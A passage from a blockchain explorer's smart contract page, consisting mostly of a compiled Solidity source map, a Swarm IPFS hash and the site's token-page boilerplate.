329::-;5264:6;5313:2;5301:9;5292:7;5288:23;5284:32;5281:119;;;5319:79;;:::i;:::-;5281:119;5439:1;5464:53;5509:7;5500:6;5489:9;5485:22;5464:53;:::i;:::-;5454:63;;5410:117;5205:329;;;;:::o;5540:::-;5599:6;5648:2;5636:9;5627:7;5623:23;5619:32;5616:119;;;5654:79;;:::i;:::-;5616:119;5774:1;5799:53;5844:7;5835:6;5824:9;5820:22;5799:53;:::i;:::-;5789:63;;5745:117;5540:329;;;;:::o;5875:474::-;5943:6;5951;6000:2;5988:9;5979:7;5975:23;5971:32;5968:119;;;6006:79;;:::i;:::-;5968:119;6126:1;6151:53;6196:7;6187:6;6176:9;6172:22;6151:53;:::i;:::-;6141:63;;6097:117;6253:2;6279:53;6324:7;6315:6;6304:9;6300:22;6279:53;:::i;:::-;6269:63;;6224:118;5875:474;;;;;:::o;6355:117::-;6464:1;6461;6454:12;6478:180;6526:77;6523:1;6516:88;6623:4;6620:1;6613:15;6647:4;6644:1;6637:15;6664:281;6747:27;6769:4;6747:27;:::i;:::-;6739:6;6735:40;6877:6;6865:10;6862:22;6841:18;6829:10;6826:34;6823:62;6820:88;;;6888:18;;:::i;:::-;6820:88;6928:10;6924:2;6917:22;6707:238;6664:281;;:::o;6951:129::-;6985:6;7012:20;;:::i;:::-;7002:30;;7041:33;7069:4;7061:6;7041:33;:::i;:::-;6951:129;;;:::o;7086:311::-;7163:4;7253:18;7245:6;7242:30;7239:56;;;7275:18;;:::i;:::-;7239:56;7325:4;7317:6;7313:17;7305:25;;7385:4;7379;7375:15;7367:23;;7086:311;;;:::o;7403:117::-;7512:1;7509;7502:12;7543:710;7639:5;7664:81;7680:64;7737:6;7680:64;:::i;:::-;7664:81;:::i;:::-;7655:90;;7765:5;7794:6;7787:5;7780:21;7828:4;7821:5;7817:16;7810:23;;7881:4;7873:6;7869:17;7861:6;7857:30;7910:3;7902:6;7899:15;7896:122;;;7929:79;;:::i;:::-;7896:122;8044:6;8027:220;8061:6;8056:3;8053:15;8027:220;;;8136:3;8165:37;8198:3;8186:10;8165:37;:::i;:::-;8160:3;8153:50;8232:4;8227:3;8223:14;8216:21;;8103:144;8087:4;8082:3;8078:14;8071:21;;8027:220;;;8031:21;7645:608;;7543:710;;;;;:::o;8276:370::-;8347:5;8396:3;8389:4;8381:6;8377:17;8373:27;8363:122;;8404:79;;:::i;:::-;8363:122;8521:6;8508:20;8546:94;8636:3;8628:6;8621:4;8613:6;8609:17;8546:94;:::i;:::-;8537:103;;8353:293;8276:370;;;;:::o;8652:684::-;8745:6;8753;8802:2;8790:9;8781:7;8777:23;8773:32;8770:119;;;8808:79;;:::i;:::-;8770:119;8956:1;8945:9;8941:17;8928:31;8986:18;8978:6;8975:30;8972:117;;;9008:79;;:::i;:::-;8972:117;9113:78;9183:7;9174:6;9163:9;9159:22;9113:78;:::i;:::-;9103:88;;8899:302;9240:2;9266:53;9311:7;9302:6;9291:9;9287:22;9266:53;:::i;:::-;9256:63;;9211:118;8652:684;;;;;:::o;9342:180::-;9390:77;9387:1;9380:88;9487:4;9484:1;9477:15;9511:4;9508:1;9501:15;9528:320;9572:6;9609:1;9603:4;9599:12;9589:22;;9656:1;9650:4;9646:12;9677:18;9667:81;;9733:4;9725:6;9721:17;9711:27;;9667:81;9795:2;9787:6;9784:14;9764:18;9761:38;9758:84;;9814:18;;:::i;:::-;9758:84;9579:269;9528:320;;;:::o;9854:227::-;9994:34;9990:1;9982:6;9978:14;9971:58;10063:10;10058:2;10050:6;10046:15;10039:35;9854:227;:::o;10087:366::-;10229:3;10250:67;10314:2;10309:3;10250:67;:::i;:::-;10243:74;;10326:93;10415:3;10326:93;:::i;:::-;10444:2;10439:3;10435:12;10428:19;;10087:366;;;:::o;10459:419::-;10625:4;10663:2;10652:9;10648:18;10640:26;;10712:9;10706:4;10702:20;10698:1;10687:9;10683:17;10676:47;10740:131;10866:4;10740:131;:::i;:::-;10732:139;;10459:419;;;:::o;10884:180::-;10932:77;10929:1;10922:88;11029:4;11026:1;11019:15;11053:4;11050:1;11043:15;11070:191;11110:3;11129:20;11147:1;11129:20;:::i;:::-;11124:25;;11163:20;11181:1;11163:20;:::i;:::-;11158:25;;11206:1;11203;11199:9;11192:16;;11227:3;11224:1;11221:10;11218:36;;;11234:18;;:::i;:::-;11218:36;11070:191;;;;:::o;11267:102::-;11309:8;11356:5;11353:1;11349:13;11328:34;;11267:102;;;:::o;11375:848::-;11436:5;11443:4;11467:6;11458:15;;11491:5;11482:14;;11505:712;11526:1;11516:8;11513:15;11505:712;;;11621:4;11616:3;11612:14;11606:4;11603:24;11600:50;;;11630:18;;:::i;:::-;11600:50;11680:1;11670:8;11666:16;11663:451;;;12095:4;12088:5;12084:16;12075:25;;11663:451;12145:4;12139;12135:15;12127:23;;12175:32;12198:8;12175:32;:::i;:::-;12163:44;;11505:712;;;11375:848;;;;;;;:::o;12229:1073::-;12283:5;12474:8;12464:40;;12495:1;12486:10;;12497:5;;12464:40;12523:4;12513:36;;12540:1;12531:10;;12542:5;;12513:36;12609:4;12657:1;12652:27;;;;12693:1;12688:191;;;;12602:277;;12652:27;12670:1;12661:10;;12672:5;;;12688:191;12733:3;12723:8;12720:17;12717:43;;;12740:18;;:::i;:::-;12717:43;12789:8;12786:1;12782:16;12773:25;;12824:3;12817:5;12814:14;12811:40;;;12831:18;;:::i;:::-;12811:40;12864:5;;;12602:277;;12988:2;12978:8;12975:16;12969:3;12963:4;12960:13;12956:36;12938:2;12928:8;12925:16;12920:2;12914:4;12911:12;12907:35;12891:111;12888:246;;;13044:8;13038:4;13034:19;13025:28;;13079:3;13072:5;13069:14;13066:40;;;13086:18;;:::i;:::-;13066:40;13119:5;;12888:246;13159:42;13197:3;13187:8;13181:4;13178:1;13159:42;:::i;:::-;13144:57;;;;13233:4;13228:3;13224:14;13217:5;13214:25;13211:51;;;13242:18;;:::i;:::-;13211:51;13291:4;13284:5;13280:16;13271:25;;12229:1073;;;;;;:::o;13308:281::-;13366:5;13390:23;13408:4;13390:23;:::i;:::-;13382:31;;13434:25;13450:8;13434:25;:::i;:::-;13422:37;;13478:104;13515:66;13505:8;13499:4;13478:104;:::i;:::-;13469:113;;13308:281;;;;:::o;13595:410::-;13635:7;13658:20;13676:1;13658:20;:::i;:::-;13653:25;;13692:20;13710:1;13692:20;:::i;:::-;13687:25;;13747:1;13744;13740:9;13769:30;13787:11;13769:30;:::i;:::-;13758:41;;13948:1;13939:7;13935:15;13932:1;13929:22;13909:1;13902:9;13882:83;13859:139;;13978:18;;:::i;:::-;13859:139;13643:362;13595:410;;;;:::o;14011:182::-;14151:34;14147:1;14139:6;14135:14;14128:58;14011:182;:::o;14199:366::-;14341:3;14362:67;14426:2;14421:3;14362:67;:::i;:::-;14355:74;;14438:93;14527:3;14438:93;:::i;:::-;14556:2;14551:3;14547:12;14540:19;;14199:366;;;:::o;14571:419::-;14737:4;14775:2;14764:9;14760:18;14752:26;;14824:9;14818:4;14814:20;14810:1;14799:9;14795:17;14788:47;14852:131;14978:4;14852:131;:::i;:::-;14844:139;;14571:419;;;:::o;14996:224::-;15136:34;15132:1;15124:6;15120:14;15113:58;15205:7;15200:2;15192:6;15188:15;15181:32;14996:224;:::o;15226:366::-;15368:3;15389:67;15453:2;15448:3;15389:67;:::i;:::-;15382:74;;15465:93;15554:3;15465:93;:::i;:::-;15583:2;15578:3;15574:12;15567:19;;15226:366;;;:::o;15598:419::-;15764:4;15802:2;15791:9;15787:18;15779:26;;15851:9;15845:4;15841:20;15837:1;15826:9;15822:17;15815:47;15879:131;16005:4;15879:131;:::i;:::-;15871:139;;15598:419;;;:::o;16023:180::-;16071:77;16068:1;16061:88;16168:4;16165:1;16158:15;16192:4;16189:1;16182:15;16209:332;16330:4;16368:2;16357:9;16353:18;16345:26;;16381:71;16449:1;16438:9;16434:17;16425:6;16381:71;:::i;:::-;16462:72;16530:2;16519:9;16515:18;16506:6;16462:72;:::i;:::-;16209:332;;;;;:::o;16547:223::-;16687:34;16683:1;16675:6;16671:14;16664:58;16756:6;16751:2;16743:6;16739:15;16732:31;16547:223;:::o;16776:366::-;16918:3;16939:67;17003:2;16998:3;16939:67;:::i;:::-;16932:74;;17015:93;17104:3;17015:93;:::i;:::-;17133:2;17128:3;17124:12;17117:19;;16776:366;;;:::o;17148:419::-;17314:4;17352:2;17341:9;17337:18;17329:26;;17401:9;17395:4;17391:20;17387:1;17376:9;17372:17;17365:47;17429:131;17555:4;17429:131;:::i;:::-;17421:139;;17148:419;;;:::o;17573:221::-;17713:34;17709:1;17701:6;17697:14;17690:58;17782:4;17777:2;17769:6;17765:15;17758:29;17573:221;:::o;17800:366::-;17942:3;17963:67;18027:2;18022:3;17963:67;:::i;:::-;17956:74;;18039:93;18128:3;18039:93;:::i;:::-;18157:2;18152:3;18148:12;18141:19;;17800:366;;;:::o;18172:419::-;18338:4;18376:2;18365:9;18361:18;18353:26;;18425:9;18419:4;18415:20;18411:1;18400:9;18396:17;18389:47;18453:131;18579:4;18453:131;:::i;:::-;18445:139;;18172:419;;;:::o;18597:177::-;18737:29;18733:1;18725:6;18721:14;18714:53;18597:177;:::o;18780:366::-;18922:3;18943:67;19007:2;19002:3;18943:67;:::i;:::-;18936:74;;19019:93;19108:3;19019:93;:::i;:::-;19137:2;19132:3;19128:12;19121:19;;18780:366;;;:::o;19152:419::-;19318:4;19356:2;19345:9;19341:18;19333:26;;19405:9;19399:4;19395:20;19391:1;19380:9;19376:17;19369:47;19433:131;19559:4;19433:131;:::i;:::-;19425:139;;19152:419;;;:::o;19577:224::-;19717:34;19713:1;19705:6;19701:14;19694:58;19786:7;19781:2;19773:6;19769:15;19762:32;19577:224;:::o;19807:366::-;19949:3;19970:67;20034:2;20029:3;19970:67;:::i;:::-;19963:74;;20046:93;20135:3;20046:93;:::i;:::-;20164:2;20159:3;20155:12;20148:19;;19807:366;;;:::o;20179:419::-;20345:4;20383:2;20372:9;20368:18;20360:26;;20432:9;20426:4;20422:20;20418:1;20407:9;20403:17;20396:47;20460:131;20586:4;20460:131;:::i;:::-;20452:139;;20179:419;;;:::o;20604:222::-;20744:34;20740:1;20732:6;20728:14;20721:58;20813:5;20808:2;20800:6;20796:15;20789:30;20604:222;:::o;20832:366::-;20974:3;20995:67;21059:2;21054:3;20995:67;:::i;:::-;20988:74;;21071:93;21160:3;21071:93;:::i;:::-;21189:2;21184:3;21180:12;21173:19;;20832:366;;;:::o;21204:419::-;21370:4;21408:2;21397:9;21393:18;21385:26;;21457:9;21451:4;21447:20;21443:1;21432:9;21428:17;21421:47;21485:131;21611:4;21485:131;:::i;:::-;21477:139;;21204:419;;;:::o;21629:225::-;21769:34;21765:1;21757:6;21753:14;21746:58;21838:8;21833:2;21825:6;21821:15;21814:33;21629:225;:::o;21860:366::-;22002:3;22023:67;22087:2;22082:3;22023:67;:::i;:::-;22016:74;;22099:93;22188:3;22099:93;:::i;:::-;22217:2;22212:3;22208:12;22201:19;;21860:366;;;:::o;22232:419::-;22398:4;22436:2;22425:9;22421:18;22413:26;;22485:9;22479:4;22475:20;22471:1;22460:9;22456:17;22449:47;22513:131;22639:4;22513:131;:::i;:::-;22505:139;;22232:419;;;:::o

Swarm Source

ipfs://e9c6205a6ae72da16e12463d0c37b95b9742faccfe541765a317629a30c40390
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.